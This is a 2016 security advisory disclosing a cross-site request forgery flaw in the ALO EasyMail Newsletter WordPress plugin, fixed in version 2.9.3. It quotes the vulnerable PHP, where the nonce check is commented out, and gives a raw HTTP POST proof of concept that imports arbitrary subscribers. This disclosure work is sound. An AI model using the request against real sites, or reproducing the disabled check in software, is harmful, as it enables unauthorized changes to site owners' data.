------------------------------------------------------------------------
Cross-Site Request Forgery in ALO EasyMail Newsletter WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0021

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
It was discovered that the ALO EasyMail Newsletter WordPress Plugin is
vulnerable to Cross-Site Request Forgery. Amongst others, this issue can
be used to add/import arbitrary subscribers. In order to exploit this
issue, the attacker has to lure/force a victim into opening a malicious
website/link.

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on ALO EasyMail Newsletter WordPress
Plugin version 2.9.2.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is resolved in ALO EasyMail Newsletter version 2.9.3.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_alo_easymail_newsletter_wordpress_plugin.html

A number of actions within ALO EasyMail Newsletter consist of two steps. The 'step one' action is protected against Cross-Site Request Forgery by means of the check_admin_referer() WordPress function.

<?php 
/**
* Bulk action: Step #1/2
*/
if ( isset($_REQUEST['doaction_step1']) ) {
   check_admin_referer('alo-easymail_subscribers');
However the call to check_admin_referer() has been commented out for all 'step two' actions. Due to this it is possible for an attacker to perform a Cross-Site Request Forgery attack for all the 'step 2' actions.

/**
* Bulk action: Step #2/2
*/
if ( isset($_REQUEST['doaction_step2']) ) {
   //if($wp_version >= '2.6.5') check_admin_referer('alo-easymail_subscribers');

   
Amongst others, this issue can be used to add/import arbitrary subscribers. In order to exploit this issue, the attacker has to lure/force a victim into opening a malicious website/link.
Proof of concept
POST /wp-admin/edit.php?post_type=newsletter&page=alo-easymail%2Fpages%2Falo-easymail-admin-subscribers.php&doaction_step2=true&action=import HTTP/1.1
Host: <target>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: <session cookies>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------17016644981835490787491067954
Content-Length: 645
   
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="uploaded_csv"; filename="foo.csv"
Content-Type: text/plain
   
sumofpwn@securify.n;Summer of Pwnage;en
   
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="post_type"
   
newsletter
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="action"
   
import_step2
-----------------------------17016644981835490787491067954
Content-Disposition: form-data; name="doaction_step2"
   
Upload CSV file
-----------------------------17016644981835490787491067954--


------------------------------------------------------------------------
Summer of Pwnage (https://sumofpwn.nl) is a Dutch community project. Its
goal is to contribute to the security of popular, widely used OSS
projects in a fun and educational way.